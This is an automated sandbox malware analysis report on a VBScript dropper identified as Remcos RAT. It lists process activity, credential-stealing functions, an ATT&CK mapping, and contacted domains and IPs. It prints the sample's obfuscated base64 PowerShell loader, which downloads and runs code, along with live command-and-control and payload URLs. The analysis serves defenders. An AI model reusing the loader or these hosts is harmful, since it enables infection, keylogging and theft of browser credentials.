                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $hamminesses = 'jgxpdgvyywxpdhkgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcnoyrob2vjywtlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky29nbm9tzw5zid0gjghvzwnha2uurg93bmxvywreyxrhkcrsaxrlcmfsaxr5ktsky2fyymfuaw9uid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgnvz25vbwvucyk7jhrlbgvwag9uawnhbgx5id0gjzw8qkftrty0x1nuqvjupj4noyrlegnsdxnvcnkgpsanpdxcqvnfnjrfru5epj4noyrzy29vcca9icrjyxjiyw5pb24usw5kzxhpzigkdgvszxbob25py2fsbhkpoyrib3dszwdnzwqgpsaky2fyymfuaw9ulkluzgv4t2yojgv4y2x1c29yesk7jhnjb29wic1nzsawic1hbmqgjgjvd2xlz2dlzcatz3qgjhnjb29woyrzy29vccarpsakdgvszxbob25py2fsbhkutgvuz3rooyrizxdoaxnrzxjlzca9icrib3dszwdnzwqglsakc2nvb3a7jgzlc3rvb25lcnkgpsaky2fyymfuaw9ulln1ynn0cmluzygkc2nvb3asicrizxdoaxnrzxjlzck7jhbyb3rldxnlcya9ic1qb2luicgkzmvzdg9vbmvyes5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzmvzdg9vbmvyes5mzw5ndggpxtskzwxlbwlzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkchjvdgv1c2vzktskc3bvcmfkawmgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrlbgvtaxmpoyrkdxbwaw5nid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgr1chbpbmcusw52b2tlkcrudwxslcbakccwl24xq1pul3ivzwuuzxrzyxavlzpzchr0accsicckc2nozwr1bgvycycsicckc2nozwr1bgvycycsicckc2nozwr1bgvycycsicdnu0j1awxkjywgjyrzy2hlzhvszxjzjywnjhnjagvkdwxlcnmnlcckc2nozwr1bgvycycsj1vstccsicddolxqcm9ncmftrgf0yvwnlcdjbgfzc2vycycsj3zicycsjzenlccxjykpow==';$stickhandled = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($hamminesses));invoke-expression $stickhandled
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $hamminesses = 'jgxpdgvyywxpdhkgpsanahr0chm6ly9yzxmuy2xvdwrpbmfyes5jb20vzhl0zmx0njful2ltywdll3vwbg9hzc92mtczmzezndk0ny9ia2xwexnlewv1ddrpbxb3ntbums5qcgcnoyrob2vjywtlid0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsky29nbm9tzw5zid0gjghvzwnha2uurg93bmxvywreyxrhkcrsaxrlcmfsaxr5ktsky2fyymfuaw9uid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgnvz25vbwvucyk7jhrlbgvwag9uawnhbgx5id0gjzw8qkftrty0x1nuqvjupj4noyrlegnsdxnvcnkgpsanpdxcqvnfnjrfru5epj4noyrzy29vcca9icrjyxjiyw5pb24usw5kzxhpzigkdgvszxbob25py2fsbhkpoyrib3dszwdnzwqgpsaky2fyymfuaw9ulkluzgv4t2yojgv4y2x1c29yesk7jhnjb29wic1nzsawic1hbmqgjgjvd2xlz2dlzcatz3qgjhnjb29woyrzy29vccarpsakdgvszxbob25py2fsbhkutgvuz3rooyrizxdoaxnrzxjlzca9icrib3dszwdnzwqglsakc2nvb3a7jgzlc3rvb25lcnkgpsaky2fyymfuaw9ulln1ynn0cmluzygkc2nvb3asicrizxdoaxnrzxjlzck7jhbyb3rldxnlcya9ic1qb2luicgkzmvzdg9vbmvyes5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzmvzdg9vbmvyes5mzw5ndggpxtskzwxlbwlzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkchjvdgv1c2vzktskc3bvcmfkawmgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrlbgvtaxmpoyrkdxbwaw5nid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgr1chbpbmcusw52b2tlkcrudwxslcbakccwl24xq1pul3ivzwuuzxrzyxavlzpzchr0accsicckc2nozwr1bgvycycsicckc2nozwr1bgvycycsicckc2nozwr1bgvycycsicdnu0j1awxkjywgjyrzy2hlzhvszxjzjywnjhnjagvkdwxlcnmnlcckc2nozwr1bgvycycsj1vstccsicddolxqcm9ncmftrgf0yvwnlcdjbgfzc2vycycsj3zicycsjzenlccxjykpow==';$stickhandled = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($hamminesses));invoke-expression $stickhandledJump to behavior
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerst
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd&
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\Intern
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager{&
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerEM dQ#
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager^&
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerU&
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001263000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, logs.dat.15.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00433E0A cpuid 15_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,15_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,15_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,15_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00450E6A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00404915 GetLocalTime,CreateEventA,CreateThread,15_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041A7A2 GetComputerNameExW,GetUserNameW,15_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_0044800F
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Contains functionality to steal Chrome passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040B21B
                        Contains functionality to steal Firefox passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db15_2_0040B335

                        Remote Access Functionality

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe15_2_00405042

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information331
                        Scripting                        		Valid Accounts1
                        Native API                        		331
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		3
                        Obfuscated Files or Information                        		211
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol211
                        Input Capture                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Windows Service                        		1
                        Access Token Manipulation                        		1
                        DLL Side-Loading                        		2
                        Credentials In Files                        		1
                        System Service Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		21
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution                        		Login Hook1
                        Windows Service                        		1
                        Bypass User Account Control                        		NTDS3
                        File and Directory Discovery                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell                        		Network Logon Script222
                        Process Injection                        		11
                        Masquerading                        		LSA Secrets43
                        System Information Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials31
                        Security Software Discovery                        		VNCGUI Input Capture13
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation                        		DCSync31
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                        Process Injection                        		Proc Filesystem3
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571703 Sample: Aktarma,pdf.vbs Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 42 paste.ee 2->42 44 rem.pushswroller.eu 2->44 46 10 other IPs or domains 2->46 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 66 12 other signatures 2->66 9 wscript.exe 1 2->9         started        12 svchost.exe 1 1 2->12         started        15 wscript.exe 2->15         started        signatures3 64 Connects to a pastebin service (likely for C&C) 42->64 process4 dnsIp5 80 VBScript performs obfuscated calls to suspicious functions 9->80 82 Suspicious powershell command line found 9->82 84 Wscript starts Powershell (via cmd or directly) 9->84 86 2 other signatures 9->86 17 powershell.exe 14 17 9->17         started        52 127.0.0.1 unknown unknown 12->52 signatures6 process7 dnsIp8 38 cloudinary.map.fastly.net 151.101.1.137, 443, 49714 FASTLYUS United States 17->38 40 paste.ee 172.67.187.200, 443, 49772 CLOUDFLARENETUS United States 17->40 54 Writes to foreign memory regions 17->54 56 Injects a PE file into a foreign processes 17->56 21 MSBuild.exe 17->21         started        24 MSBuild.exe 3 16 17->24         started        28 cmd.exe 2 17->28         started        30 conhost.exe 17->30         started        signatures9 process10 dnsIp11 68 Contains functionality to bypass UAC (CMSTPLUA) 21->68 70 Contains functionalty to change the wallpaper 21->70 72 Contains functionality to steal Chrome passwords or cookies 21->72 78 3 other signatures 21->78 48 rem.pushswroller.eu 45.80.158.30, 23101, 49783 UK2NET-ASGB Netherlands 24->48 50 geoplugin.net 178.237.33.50, 49790, 80 ATOM86-ASATOM86NL Netherlands 24->50 34 C:\ProgramData\remcos\logs.dat, data 24->34 dropped 74 Installs a global keyboard hook 24->74 36 C:\ProgramData\classers.vbs, ASCII 28->36 dropped 76 Command shell drops VBS files 28->76 32 conhost.exe 28->32         started        file12 signatures13 process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Aktarma,pdf.vbs5%ReversingLabsWin32.Trojan.Generic

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        firewarzone.ydns.eu0%Avira URL Cloudsafe
                        rem.pushswroller.eu100%Avira URL Cloudmalware
                        sun.drillmmcsnk.eu0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.210.172
                        		truefalse
                          		high
                          paste.ee
                          		172.67.187.200
                          		truefalse
                            		high
                            rem.pushswroller.eu
                            		45.80.158.30
                            		truetrue
                              		unknown
                              geoplugin.net
                              		178.237.33.50
                              		truefalse
                                		high
                                cloudinary.map.fastly.net
                                		151.101.1.137
                                		truefalse
                                  		high
                                  s-part-0035.t-0009.t-msedge.net
                                  		13.107.246.63
                                  		truefalse
                                    		high
                                    ax-0001.ax-msedge.net
                                    		150.171.27.10
                                    		truefalse
                                      		high
                                      fp2e7a.wpc.phicdn.net
                                      		192.229.221.95
                                      		truefalse
                                        		high
                                        res.cloudinary.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          tse1.mm.bing.net
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            sun.drillmmcsnk.eutrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://geoplugin.net/json.gpfalse
                                              		high
                                              firewarzone.ydns.eutrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              rem.pushswroller.eutrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://paste.ee/r/TZC1n/0false
                                                		high
                                                https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://geoplugin.net/json.gp-V)MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com;powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000012.00000003.2503873978.000002DC70B20000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drfalse
                                                            		high
                                                            http://crl.ver)svchost.exe, 00000012.00000002.3420667451.000002DC70C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://analytics.paste.eepowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://geoplugin.net/json.gpSystem32MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.compowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://geoplugin.net/json.gpVTMSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://g.live.com/odclientsettings/Prod1C:qmgr.db.18.drfalse
                                                                          		high
                                                                          https://res.cloudinary.compowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://geoplugin.net/json.gp/CMSBuild.exe, 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://analytics.paste.ee;powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://geoplugin.net/json.gpalMSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://geoplugin.net/json.gp(VMSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdnjs.cloudflare.compowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdnjs.cloudflare.com;powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://geoplugin.net/json.gp%hMSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://secure.gravatar.compowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://themes.googleusercontent.compowershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  172.67.187.200
                                                                                                  		paste.eeUnited States
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  45.80.158.30
                                                                                                  		rem.pushswroller.euNetherlands
                                                                                                  		13213UK2NET-ASGBtrue
                                                                                                  151.101.1.137
                                                                                                  		cloudinary.map.fastly.netUnited States
                                                                                                  		54113FASTLYUSfalse
                                                                                                  178.237.33.50
                                                                                                  		geoplugin.netNetherlands
                                                                                                  		8455ATOM86-ASATOM86NLfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1571703
                                                                                                  Start date and time:2024-12-09 16:33:08 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 5m 49s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:21
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
